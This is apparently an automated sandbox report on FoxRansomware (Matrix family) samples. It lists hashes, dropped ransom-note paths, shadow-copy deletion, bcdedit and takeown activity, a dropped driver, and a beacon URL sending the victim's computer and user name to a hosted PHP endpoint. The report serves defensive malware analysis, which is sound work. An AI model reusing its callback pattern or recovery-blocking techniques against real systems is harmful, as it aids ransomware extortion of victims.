Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Resubmissions
03-04-2024 17:37
240403-v68g6sga2w 10Analysis
-
max time kernel
141s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240319-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\storage\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\en_CA\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_TW\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\202914\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sl\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\uk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280811\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pt_BR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}v64.0.5329\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ko\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe HTTP URL 4 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GAWKBMOT|Admin&sid=o1wB8bJkxeRqyDke&phase=START Process not Found File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Favorites\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\UEV\Scripts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\C7OS0C36\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\USOShared\Logs\System\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 7892 bcdedit.exe 7908 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 151 4692 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS yMelI2Cu64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" yMelI2Cu64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 64 IoCs
pid Process 4932 NWMrNpDd.exe 5636 yMelI2Cu.exe 5712 yMelI2Cu64.exe 5660 yMelI2Cu.exe 5680 yMelI2Cu.exe 3508 yMelI2Cu.exe 6580 yMelI2Cu.exe 1528 yMelI2Cu.exe 5980 yMelI2Cu.exe 4768 yMelI2Cu.exe 4296 yMelI2Cu.exe 6440 yMelI2Cu.exe 5616 yMelI2Cu.exe 6200 yMelI2Cu.exe 4840 yMelI2Cu.exe 6272 yMelI2Cu.exe 6276 yMelI2Cu.exe 3116 yMelI2Cu.exe 7304 yMelI2Cu.exe 7480 yMelI2Cu.exe 7420 yMelI2Cu.exe 8044 yMelI2Cu.exe 7668 yMelI2Cu.exe 7732 yMelI2Cu.exe 7932 yMelI2Cu.exe 8016 yMelI2Cu.exe 6644 yMelI2Cu.exe 528 yMelI2Cu.exe 3388 yMelI2Cu.exe 6708 yMelI2Cu.exe 2120 yMelI2Cu.exe 672 yMelI2Cu.exe 6516 yMelI2Cu.exe 7028 yMelI2Cu.exe 7000 yMelI2Cu.exe 6112 yMelI2Cu.exe 6624 yMelI2Cu.exe 6424 yMelI2Cu.exe 1096 yMelI2Cu.exe 7416 yMelI2Cu.exe 4924 yMelI2Cu.exe 2984 yMelI2Cu.exe 7404 yMelI2Cu.exe 3596 yMelI2Cu.exe 5244 yMelI2Cu.exe 5348 yMelI2Cu.exe 5068 yMelI2Cu.exe 6152 yMelI2Cu.exe 1972 yMelI2Cu.exe 3204 yMelI2Cu.exe 2872 yMelI2Cu.exe 5756 yMelI2Cu.exe 6212 yMelI2Cu.exe 908 yMelI2Cu.exe 5164 yMelI2Cu.exe 6592 yMelI2Cu.exe 1124 yMelI2Cu.exe 6796 yMelI2Cu.exe 5844 yMelI2Cu.exe 5916 yMelI2Cu.exe 6944 yMelI2Cu.exe 5396 yMelI2Cu.exe 7072 yMelI2Cu.exe 2620 yMelI2Cu.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 7044 takeown.exe 6164 Process not Found 7296 takeown.exe 5796 takeown.exe 3264 takeown.exe 2452 takeown.exe 5456 Process not Found 3168 takeown.exe 6524 takeown.exe 7984 takeown.exe 5576 Process not Found 7836 Process not Found 5280 takeown.exe 5076 takeown.exe 4128 Process not Found 5948 takeown.exe 5524 Process not Found 6320 Process not Found 6232 takeown.exe 5476 takeown.exe 6752 takeown.exe 6164 takeown.exe 7812 takeown.exe 5132 Process not Found 1056 takeown.exe 6852 takeown.exe 5500 takeown.exe 6684 takeown.exe 7624 takeown.exe 8096 takeown.exe 8004 Process not Found 8012 Process not Found 7196 Process not Found 6752 takeown.exe 2992 takeown.exe 6900 takeown.exe 7160 Process not Found 6488 takeown.exe 5272 takeown.exe 3740 takeown.exe 4532 takeown.exe 8172 takeown.exe 4076 takeown.exe 4312 Process not Found 6668 Process not Found 6044 Process not Found 7292 takeown.exe 4768 takeown.exe 6984 Process not Found 7344 takeown.exe 7908 takeown.exe 5844 takeown.exe 6888 Process not Found 7988 Process not Found 2440 takeown.exe 8012 takeown.exe 7196 takeown.exe 7640 Process not Found 7976 Process not Found 5764 Process not Found 6308 takeown.exe 8116 takeown.exe 7492 Process not Found 4892 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x0006000000023224-4924.dat upx behavioral6/memory/5636-4927-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5660-6785-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5660-6786-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5680-6788-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3508-6793-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6580-6795-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/1528-6798-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5980-6800-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4768-6802-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4296-6804-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5636-6808-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6440-6809-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5616-6813-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6200-6815-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4840-6817-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6272-6819-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6276-6821-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3116-6823-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7304-6825-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7480-6827-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7420-6829-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/8044-6834-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7668-6836-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7732-6838-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7932-6840-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/8016-6842-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6644-6844-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/528-6846-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3388-6851-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6708-6853-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2120-6855-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/672-6857-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6516-6859-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7028-6861-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7000-6863-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6112-6865-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6624-6867-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6624-6868-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6424-6870-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/1096-6874-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7416-6877-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/4924-6879-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2984-6881-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/7404-6883-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3596-6885-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5244-6887-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5348-6889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5068-6891-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6152-6893-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/1972-6897-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/3204-6900-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/2872-6902-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5756-6904-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6212-6906-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/908-6908-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5164-6910-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6592-6912-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/1124-6913-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6796-6914-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5844-6915-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5916-6919-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/6944-6920-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral6/memory/5396-6922-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program 